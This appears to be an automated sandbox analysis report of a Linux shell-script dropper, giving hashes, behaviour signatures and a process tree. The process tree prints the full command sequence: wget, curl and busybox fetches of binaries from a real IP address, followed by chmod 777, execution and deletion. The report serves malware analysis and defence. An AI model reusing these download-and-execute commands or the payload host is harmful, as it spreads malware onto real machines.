Analysis
-
max time kernel
32s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1589 chmod 1523 chmod 1529 chmod 1559 chmod 1631 chmod 1681 chmod 1577 chmod 1595 chmod 1601 chmod 1637 chmod 1553 chmod 1583 chmod 1625 chmod 1643 chmod 1675 chmod 1541 chmod 1613 chmod 1619 chmod 1535 chmod 1571 chmod 1649 chmod 1565 chmod 1607 chmod 1661 chmod 1687 chmod 1547 chmod 1655 chmod 1669 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 1524 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 1530 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 1536 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 1542 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 1548 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 1554 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 1560 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 1566 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 1572 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 1578 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 1584 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 1590 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 1596 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 1602 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 1608 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 1614 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 1620 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 1626 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 1632 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 1638 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 1644 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 1650 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 1656 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 1662 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 1670 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 1676 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 1682 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 1688 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1593 curl 1594 busybox 1596 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 1597 rm 1616 wget 1617 curl 1618 busybox 1592 wget 1621 rm 1620 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:1514
-
/bin/rm/bin/rm bins.sh2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1522
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1528
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1534
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1540
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1546
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1552
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1558
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1564
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1570
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1576
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1582
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1588
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1594
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1596
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1600
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1606
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1612
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1618
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1620
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1624
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1630
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1636
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1642
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1648
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1651
-
-
